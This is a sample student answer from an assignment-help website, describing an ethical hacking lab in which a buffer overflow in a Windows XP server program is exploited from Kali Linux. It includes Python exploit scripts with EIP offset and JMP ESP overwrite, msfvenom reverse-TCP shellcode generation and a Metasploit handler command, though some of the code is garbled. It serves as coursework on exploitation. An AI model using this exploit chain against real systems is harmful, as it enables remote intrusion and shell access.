Free Samples
CSI3508 Ethical Hacking And Defence For Immunity Debugger
.cms-body-content table{width:100%!important;} #subhidecontent{ position: relative;
overflow-x: auto;
width: 100%;}
CSI3508 Ethical Hacking And Defence For Immunity Debugger
0 Download4 Pages / 799 Words
Course Code: CSI3508
University: Edith Cowan University
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: Australia
Question:
You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.
Answer:
For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and Windows XP and for both the machines the network configuration is set to NAT. The configuration NAT enables the private IP to be connected with the internet and enable communication. The IP address are checked for enabling communication between the machines and on the windows machine the immunity debugger is opened for running the python script and loading the server.exe and executed.
Then in the next step the kali linux is used for creating a file using the vi editor and is named as attack.py. The code given in the workshop is inserted in the file that is given below:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = “x41″*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is pressed for passing the exception and execution of the code. A sample result is found that is given in the following screenshot where the EIP values changes to the value used by the attacker and it is also similar for the EBP value.
The ESP is used for pointing to a certain region of memory and it contains the value that is injected by the attacker.
For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and the execution is started. In the command line interface of the kali linux machine the following command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the EIP value. For the determination of the offset value of the EIP the command “./pattern_offset.rb -l 5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending on this the address for the code is determined that jumps to the ESP. The ESP is used for the representation of the pointer for a memory for the management of the control. The server.exe is restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code in the kali linux machine is modified according to the workshop and the commands is:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = “x41″*260
# Overwrite EIP with JMP ESP
buffer += “x78x16xF3x77”
# NOPSLED
buffer += “x90″*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b ‘x00xffx0ax0bx0d’ -i 3 -f python” is used and exploitation is performed. For the exploitation the code msfconsole -x “use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit” is used and on the windows client the immunity debugger is closed. The modified python code is executed wit the IP address of the client for the completion of the workshop.
Bibliography
Cyber Security – CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India | Ethical Hacking Courses | Ethical Hacking Course In Kolkata – ISOEH. (2018). Isoeh.com. Retrieved 21 September 2018, from https://www.isoeh.com/CII-ICT-East-2017-cyber-security.html
Definitions, E., & Hope, C. (2018). What is Ethical Hacking and an Ethical Hacker?. Computerhope.com. Retrieved 21 September 2018, from https://www.computerhope.com/jargon/e/ethihack.htm
Ethical Hacking – Computing and Software Wiki. (2018). Wiki.cas.mcmaster.ca. Retrieved 21 September 2018, from https://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking
Ethical Hacking – ICT Issue. (2018). Sikandar’s E-Portfolio. Retrieved 21 September 2018, from https://sikandarbttportfolio.weebly.com/ethical-hacking—ict-issue.html
Freeman, R. (2016). Ethical hacking: what is it, and why would I need it?. IT Governance Blog. Retrieved 21 September 2018, from https://www.itgovernance.co.uk/blog/ethical-hacking-what-is-it-and-why-would-i-need-it/
What is ethical hacker? – Definition from WhatIs.com. (2018). SearchSecurity. Retrieved 21 September 2018, from https://searchsecurity.techtarget.com/definition/ethical-hacker
Free Membership to World’s Largest Sample Bank
To View this & another 50000+ free samples. Please put
your valid email id.
Yes, alert me for offers and important updates
Submit
Download Sample Now
Earn back the money you have spent on the downloaded sample by uploading a unique assignment/study material/research material you have. After we assess the authenticity of the uploaded content, you will get 100% money back in your wallet within 7 days.
UploadUnique Document
DocumentUnder Evaluation
Get Moneyinto Your Wallet
Total 4 pages
PAY 2 USD TO DOWNLOAD
*The content must not be available online or in our existing Database to qualify as
unique.
Cite This Work
To export a reference to this article please select a referencing stye below:
APA
MLA
Harvard
OSCOLA
Vancouver
My Assignment Help. (2021). Ethical Hacking And Defence For Immunity Debugger. Retrieved from https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
“Ethical Hacking And Defence For Immunity Debugger.” My Assignment Help, 2021, https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
My Assignment Help (2021) Ethical Hacking And Defence For Immunity Debugger [Online]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html[Accessed 18 December 2021].
My Assignment Help. ‘Ethical Hacking And Defence For Immunity Debugger’ (My Assignment Help, 2021)
My Assignment Help. Ethical Hacking And Defence For Immunity Debugger [Internet]. My Assignment Help. 2021 [cited 18 December 2021]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
×
.close{position: absolute;right: 5px;z-index: 999;opacity: 1;color: #ff8b00;}
×
Thank you for your interest
The respective sample has been mail to your register email id
×
CONGRATS!
$20 Credited
successfully in your wallet.
* $5 to be used on order value more than $50. Valid for
only 1
month.
Account created successfully!
We have sent login details on your registered email.
User:
Password:
Obtain plagiarism-free assignment whenever you opt for our assignment help service in Aus. We have a strict zero-plagiarism policy that our expert writers steadfastly follow when they work on your academic papers. They will find the most pertinent resources for your task and cite them appropriately. They will maintain complete originality while including information in your paper. This way, they WILL uphold your academic integrity at all cost.
Latest Management Samples
div#loaddata .card img {max-width: 100%;
}
MPM755 Building Success In Commerce
Download :
0 | Pages :
9
Course Code: MPM755
University: Deakin University
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: Australia
Answers:
Introduction
The process of developing a successful business entity requires a multidimensional analysis of several factors that relate to the internal and external environment in commerce. The areas covered in this current unit are essential in transforming the business perspective regarding the key commerce factors such as ethics, technology, culture, entrepreneurship, leadership, culture, and globalization (Nzelibe, 1996; Barza, 2…
Read
More
SNM660 Evidence Based Practice
Download :
0 | Pages :
8
Course Code: SNM660
University: The University Of Sheffield
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: United Kingdom
Answers:
Critical reflection on the objective, design, methodology and outcome of the research undertaken Assessment-I
Smoking and tobacco addiction is one of the few among the most basic general restorative issues, particularly to developed nations such as the UK. It has been represented that among all risk segments smoking is the fourth driving purpose behind infections and other several ailments like asthma, breathing and problems in the l…
Read
More
Tags:
Australia Maidstone Management Business management with marketing University of New South Wales Masters in Business Administration
BSBHRM513 Manage Workforce Planning
Download :
0 | Pages :
20
Course Code: BSBHRM513
University: Tafe NSW
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: Australia
Answer:
Task 1
1.0 Data on staff turnover and demographics
That includes the staffing information of JKL industries for the fiscal year of 2014-15, it can be said that the company is having problems related to employee turnover. For the role of Senior Manager in Sydney, the organization needs 4 managers; however, one manager is exiting. It will make one empty position which might hurt the decision making process. On the other hand, In Brisba…
Read
More
MKT2031 Issues In Small Business And Entrepreneurship
Download :
0 | Pages :
5
Course Code: MKT2031
University: University Of Northampton
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: United Kingdom
Answer:
Entrepreneurial ventures
Entrepreneurship is the capacity and willingness to develop, manage, and put in order operations of any business venture with an intention to make profits despite the risks that may be involved in such venture. Small and large businesses have a vital role to play in the overall performance of the economy. It is, therefore, necessary to consider the difference between entrepreneurial ventures, individual, and c…
Read
More
Tags:
Turkey Istanbul Management University of Employee Masters in Business Administration
MN506 System Management
Download :
0 | Pages :
7
Course Code: MN506
University: Melbourne Institute Of Technology
MyAssignmentHelp.com is not sponsored or endorsed by this college or university
Country: Australia
Answer:
Introduction
An operating system (OS) is defined as a system software that is installed in the systems for the management of the hardware along with the other software resources. Every computer system and mobile device requires an operating system for functioning and execution of operations. There is a great use of mobile devices such as tablets and Smartphones that has increased. One of the widely used and implemented operating syste…
Read
More
Tags:
Australia Cheltenham Computer Science Litigation and Dispute Management University of New South Wales Information Technology
Next